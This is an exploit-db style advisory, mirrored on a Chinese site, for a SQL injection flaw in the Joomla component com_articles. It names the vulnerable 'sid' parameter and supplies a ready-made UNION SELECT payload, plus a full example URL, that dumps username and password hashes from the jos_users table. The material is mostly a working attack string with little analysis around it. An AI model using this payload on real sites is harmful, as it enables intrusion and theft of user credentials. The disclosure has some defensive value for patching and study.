Joomla! Component com_articles – SQL Injection - 体验盒子

作者： pratul agrawal

日期： 2010-04-08

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12108/


 
**************************************************************************** 
 
 Joomla Component com_articles SQL Injection Vulnerability

****************************************************************************


# Vulnerability: Joomla Component com_articles SQL Injection Vulnerability

# email: Pratulag@yahoo.com

# Author : Pratul Agrawal





 


************************************************ ExploiT *******************************************************

 [*] Vulnerable File :

http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=[SQL]

 [*] ExploiT :

 9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—

 [*] Example :

http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—
 
 
********************************************************************************************************************



# If you have any questions, comments, or concerns, feel free to contact me.



 Quote of the day -"I'm an excellent housekeeper. Every time I get a divorce, I keep the house." hE He he